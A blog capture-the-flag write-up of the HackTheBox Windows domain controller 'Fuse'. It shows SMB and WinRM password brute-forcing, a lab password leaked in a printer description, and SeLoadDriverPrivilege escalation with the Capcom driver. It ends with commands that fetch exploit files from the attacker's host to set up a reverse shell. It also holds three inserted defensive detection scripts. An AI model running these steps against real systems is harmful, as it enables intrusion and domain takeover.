Daniel Cano Merchán - Hacking & Tech

Writeup Hackthebox HTB Fuse

0 - Basic info

OS: Windows

IP: 10.10.10.193

1 - Reconnaissance and enumeration

sudo nmap -sS -sV -sC -O 10.10.10.193
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 13:24 CEST
Nmap scan report for 10.10.10.193
Host is up (0.037s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-05 11:37:55Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/5%Time=5F2A970C%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m00s, deviation: 4h02m30s, median: 12m59s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-08-05T04:40:17-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-08-05T11:40:19
|_  start_date: 2020-08-05T11:26:09

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 312.28 seconds
nmap -Pn -n -sV --script vuln 10.10.10.193
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 13:41 CEST
Nmap scan report for 10.10.10.193
Host is up (0.039s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http         Microsoft IIS httpd 10.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-05 11:54:59Z)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
135/tcp  open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: FABRICORP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
464/tcp  open  kpasswd5?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
636/tcp  open  tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
3269/tcp open  tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/5%Time=5F2A9B0C%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 377.36 seconds

The initial recon shows that it is a Windows machine (a domain controller for fabricorp.local, judging by the Kerberos and LDAP ports). Because of errors when trying to browse to the host by name, I added the following entries to /etc/hosts:

#HTB
10.10.10.193 fuse.htb fuse.fabricorp.local

Browsing the site, it looks like a printing service (PaperCut logs); inside those logs I discovered the following users:

users:
pmerton
tlavel
sthompson
administrator
bhult

Enumerating a little more:

host -t axfr fuse.fabricorp.local 10.10.10.193
Trying "fuse.fabricorp.local"
Using domain server:
Name: 10.10.10.193
Address: 10.10.10.193#53
Aliases: 

Host fuse.fabricorp.local not found: 3(NXDOMAIN)
Received 38 bytes from 10.10.10.193#53 in 31 ms
; Transfer failed.

Nothing useful

nslookup
> server 10.10.10.193
Default server: 10.10.10.193
Address: 10.10.10.193#53
> 10.10.10.193
** server can't find 193.10.10.10.in-addr.arpa: SERVFAIL

Checking the SMB ports:

smbmap -H 10.10.10.193
[+] IP: 10.10.10.193:445        Name: fuse.htb

smbclient -L fuse.htb
Enter WORKGROUP\u915's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

Nothing…

I was stuck for a while; then I generated a custom wordlist with CeWL to brute-force SMB with the previously found users:

cewl -d 5 -m 3 -w wordlist.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

Using the custom wordlist with the MSF smb scanner:

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE          wordlist.txt     no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS             10.10.10.193     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE          users.txt        no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts
   
   
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:< '

[*] 10.10.10.193:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
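Added example (mine, not part of the original writeup): the detection-side view of the login scan above. Every failed attempt against the domain controller leaves an "account failed to log on" event (ID 4625), and the scan's signature is one source address failing against many different accounts within seconds. The script parses constructed, flattened sample events (labelled as such in the code; they are not real log lines) and flags any source that fails against a configurable number of distinct accounts inside a sliding time window. The window and account thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: Windows Security "4625 An account failed to log on" events
# flattened to "timestamp event_id target_user source_ip logon_type status".
# They are made up to look like what the SMB login scan on the page would leave
# on the domain controller (one source hitting many accounts in a few seconds,
# logon type 3 = network); they are not real log data.
SAMPLE_EVENTS = """\
2020-08-05T11:58:01 4625 pmerton 10.10.14.8 3 0xC000006D
2020-08-05T11:58:02 4625 tlavel 10.10.14.8 3 0xC000006D
2020-08-05T11:58:02 4625 sthompson 10.10.14.8 3 0xC000006D
2020-08-05T11:58:03 4625 administrator 10.10.14.8 3 0xC000006D
2020-08-05T11:58:04 4625 bhult 10.10.14.8 3 0xC000006D
2020-08-05T11:58:05 4625 pmerton 10.10.14.8 3 0xC000006D
2020-08-05T11:58:06 4625 sthompson 10.10.14.8 3 0xC000006D
2020-08-05T12:30:00 4625 dmuir 10.10.10.50 2 0xC000006D
2020-08-05T12:31:00 4624 dmuir 10.10.10.50 2 0x0
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) (?P<id>\d+) (?P<user>\S+) (?P<src>\S+) (?P<ltype>\d+) (?P<status>\S+)$"
)


def parse_events(text):
    """Parse the flattened lines, keeping only logon failures (event 4625)."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m or m.group("id") != "4625":
            continue
        events.append({
            "ts": datetime.fromisoformat(m.group("ts")),
            "user": m.group("user").lower(),
            "src": m.group("src"),
            "logon_type": int(m.group("ltype")),
        })
    return events


def find_sprays(events, window=timedelta(minutes=10), min_accounts=4):
    """Flag source IPs that failed against at least `min_accounts` distinct
    accounts within any `window`. Returns {src: {"accounts": [...], "attempts": n}}."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_src[e["src"]].append(e)
    hits = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it fits inside `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            if len({e["user"] for e in evs[start:end + 1]}) >= min_accounts:
                hits[src] = {
                    "accounts": sorted({e["user"] for e in evs}),
                    "attempts": len(evs),
                }
                break
    return hits


if __name__ == "__main__":
    for src, info in find_sprays(parse_events(SAMPLE_EVENTS)).items():
        print(f"{src}: {info['attempts']} failures across "
              f"{len(info['accounts'])} accounts: {info['accounts']}")
```

The single failure from 10.10.10.50 is a user mistyping a password and is not reported; the burst from 10.10.14.8 is. The module's own ABORT_ON_LOCKOUT option exists because an account lockout threshold is the usual control against this pattern; alerting on the distinct-account count per source catches it even when the list is short enough to stay under that threshold.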

Great, two successful hits for the users bhult and tlavel. Using smbclient to log in to the SMB service:

msf5 auxiliary(scanner/smb/smb_login) > smbclient -L fuse.htb -U bhult
[*] exec: smbclient -L fuse.htb -U bhult

Enter WORKGROUP\bhult's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

So the passwords must be changed. I used the amazing password Pizza33:

smbpasswd -r fuse.htb -U bhult
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bhult

Pizza33

But it did not work!

session setup failed: NT_STATUS_LOGON_FAILURE

So, rethinking things, I put my effort into the RPC services:


rpcclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password: 

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)

Also, the password is reset after an unknown period of time :(

rpcclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password: 
result was WERR_INVALID_NAME

2 - Vulnerability Identification

Finally I discovered something useful enumerating the printers:

rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

Great, the first password:

$fab@s3Rv1ce$1
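Added example, not from the original post: the leak above is a secret stored in a printer object's description, readable by anyone who can enumerate printers over RPC. This script parses rpcclient's enumprinters record format (the page's own output, embedded as the sample input) and flags fields that look like they carry a credential, returning them redacted so the check can run as a routine hygiene scan over printer objects. The keyword list in SECRET_RE is an assumption chosen for this example.

```python
import re

# Sample input: the rpcclient `enumprinters` record from this writeup (copied from
# the page, not generated here). The parser also handles several printers in a row,
# since rpcclient prints one `flags:` block per printer.
ENUMPRINTERS_OUTPUT = r"""
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]
"""

FIELD_RE = re.compile(r"^\s*(?P<key>\w+):\[(?P<value>.*)\]\s*$")

# Credential-looking fragments: a keyword, then ':' or '=', then the value
# (assumed keyword list; extend it for local naming habits).
SECRET_RE = re.compile(
    r"(?i)\b(?:pass(?:word|wd|phrase)?|pwd|pin|secret|token)\b\s*[:=]\s*(?P<secret>[^\s,;)]+)"
)


def parse_enumprinters(text):
    """Turn rpcclient's key:[value] lines into one dict per printer."""
    printers, current = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group("key"), m.group("value")
        if key == "flags" or current is None:  # `flags` opens a new record
            current = {}
            printers.append(current)
        current[key] = value
    return printers


def find_exposed_secrets(printers):
    """Return (printer name, field, redacted field value) for each field that
    carries a credential-looking fragment, with the secret itself masked."""
    findings = []
    for printer in printers:
        for field, value in printer.items():
            m = SECRET_RE.search(value)
            if m:
                redacted = value[:m.start("secret")] + "[REDACTED]" + value[m.end("secret"):]
                findings.append((printer.get("name", "?"), field, redacted))
    return findings


if __name__ == "__main__":
    for name, field, redacted in find_exposed_secrets(parse_enumprinters(ENUMPRINTERS_OUTPUT)):
        print(f"{name}: secret in '{field}': {redacted}")
```

Run against the page's record it reports the description field once and masks the value; the fix on the defender's side is to keep scanning credentials in a managed secret store rather than in object descriptions that any authenticated user can read.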

Now I need a valid user for this password, so I tried the discovered users again with MSF against WinRM:

msf5 auxiliary(scanner/winrm/winrm_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\Administrator:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\Guest:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\krbtgt:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\DefaultAccount:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\svc-print:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\bnielson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\sthompson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\tlavel:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\pmerton:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\svc-scan:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\bhult:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\dandrews:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\mberbatov:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\astein:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKGROUP\dmuir:$fab@s3Rv1ce$1 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/winrm/winrm_login) > show options

Module options (auxiliary/scanner/winrm/winrm_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DOMAIN            WORKGROUP        yes       The domain to use for Windows authentification
   PASSWORD          $fab@s3Rv1ce$1   no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            fuse.htb         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5985             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   URI               /wsman           yes       The URI of the WinRM service
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         users_rpc.txt    no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

Sad, because nothing worked…

3 - Exploit

I was banging my head against the wall, and then I tried the user/password combinations manually, one by one…

evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Desktop>

OK, now it worked after a long pain, but I still don't know why the scanner did not work… maybe something was wrong in the Kali Linux version of msf5 auxiliary(scanner/winrm/winrm_login).

Who knows?… User flag done.

*Evil-WinRM* PS C:\Users\svc-print\Desktop> ls


    Directory: C:\Users\svc-print\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         8/5/2020  12:10 PM             34 user.txt


a5dc[.....]e435

4 - Post-Exploitation and privilege escalation

OK, so now only root remains…

After a well deserved break I started to enumerate more:


*Evil-WinRM* PS C:\> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts                      Group            S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Something caught my attention: it is strange for a generic service account like svc-print to hold the privilege to load drivers on the system.

SeLoadDriverPrivilege

This privilege can be used to load evil drivers:

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-eescalation/
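Added example (mine, not the author's): the observation above is the heart of this box, so here it is as a least-privilege check. The script parses `whoami /all` (the page's own output, embedded as sample input), flags privileges from a known-dangerous set, and explains where this one comes from: svc-print is a member of BUILTIN\Print Operators, whose default user rights on a domain controller include "Load and unload device drivers". A last helper flags a driver service key registered under a user hive rather than under the machine's Services key, which is what the loader output further down the page shows. The DANGEROUS_PRIVILEGES and RISKY_GROUPS tables are assumptions chosen for this example.

```python
import re

# Sample input: the `whoami /all` output from this writeup, trimmed to the rows
# the checks need (copied from the page, not generated here).
WHOAMI_OUTPUT = r"""
USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts                      Group            S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Privileges that give their holder a direct path to SYSTEM; a service account
# needs none of them (assumed list for this example).
DANGEROUS_PRIVILEGES = {
    "SeLoadDriverPrivilege": "loads kernel drivers, including known-vulnerable signed ones",
    "SeDebugPrivilege": "opens any process, including SYSTEM ones",
    "SeImpersonatePrivilege": "impersonates tokens handed out by privileged services",
    "SeAssignPrimaryTokenPrivilege": "assigns a primary token to a new process",
    "SeTcbPrivilege": "acts as part of the operating system",
    "SeBackupPrivilege": "reads any file regardless of ACLs",
    "SeRestorePrivilege": "writes any file regardless of ACLs",
    "SeTakeOwnershipPrivilege": "takes ownership of any securable object",
    "SeCreateTokenPrivilege": "creates arbitrary tokens",
}

# Built-in groups whose default user rights on a domain controller include
# "Load and unload device drivers"; membership explains the privilege above.
RISKY_GROUPS = {
    "S-1-5-32-550": "Print Operators: grants SeLoadDriverPrivilege on domain controllers",
}

PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", re.M)
GROUP_RE = re.compile(
    r"^(?P<name>\S.*?)\s{2,}(?:Well-known group|Alias|Group|Label)\s+(?P<sid>S-1-[\d-]+)", re.M
)


def parse_privileges(text):
    return PRIV_RE.findall(text)  # [(privilege name, state), ...]


def parse_groups(text):
    return [(m.group("name"), m.group("sid")) for m in GROUP_RE.finditer(text)]


def audit_whoami(text):
    """List the privileges and group memberships a least-privilege review should question."""
    findings = []
    for name, state in parse_privileges(text):
        if name in DANGEROUS_PRIVILEGES:
            findings.append(f"privilege {name} [{state}]: {DANGEROUS_PRIVILEGES[name]}")
    for name, sid in parse_groups(text):
        if sid in RISKY_GROUPS:
            findings.append(f"group {name} [{sid}]: {RISKY_GROUPS[sid]}")
    return findings


def driver_key_in_user_hive(registry_path):
    r"""True when a driver service key lives under a user hive (\Registry\User\<SID>\...)
    instead of \Registry\Machine\System\CurrentControlSet\Services, where properly
    installed drivers are registered. Worth an alert in driver-load telemetry."""
    return registry_path.upper().startswith("\\REGISTRY\\USER\\")


if __name__ == "__main__":
    for finding in audit_whoami(WHOAMI_OUTPUT):
        print(finding)
```

The remediation this check points at is the group membership, not the privilege line: take the service account out of Print Operators (or, where a print service really needs it, keep the account off the domain controllers), and the driver-loading right disappears with it.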

This time I used the Capcom driver:

https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys

https://github.com/TarlogicSecurity/EoPLoadDriver/

https://github.com/tandasat/ExploitCapcom/tree/master/ExploitCapcom

I manually edited and compiled the exploit with Visual Studio. The key is using the exploit to elevate privileges.

Then I used Python to serve the exploit and files to the machine:

python3 -m http.server 8002
Serving HTTP on 0.0.0.0 port 8002 (http://0.0.0.0:8002/) ...

This time I used C:\Windows\Temp to store the exploit, which was tricky because I can write and execute there but not read… I also tried to spawn a root shell with the exploit, without success. In addition, this time the machine was unstable or something was off, because I could not use the exploit as it was, so I wrote a custom script (.bat) to open a reverse shell to my machine using a precompiled version of nc:

Editing line 292 of ExploitCapcom.cpp to use my shiny .bat:

TCHAR CommandLine[] = TEXT("C:\\Windows\\Temp\\launch.bat"); 

The basic idea is to fetch the files again into C:\Windows\Temp:

Invoke-WebRequest 10.10.14.8:8002/Capcom.sys -UseBasicParsing -OutFile C:\Windows\Temp\Capcom.sys
Invoke-WebRequest 10.10.14.8:8002/EOPLOADDRIVER.exe -UseBasicParsing -OutFile C:\Windows\Temp\EOPLOADDRIVER.exe
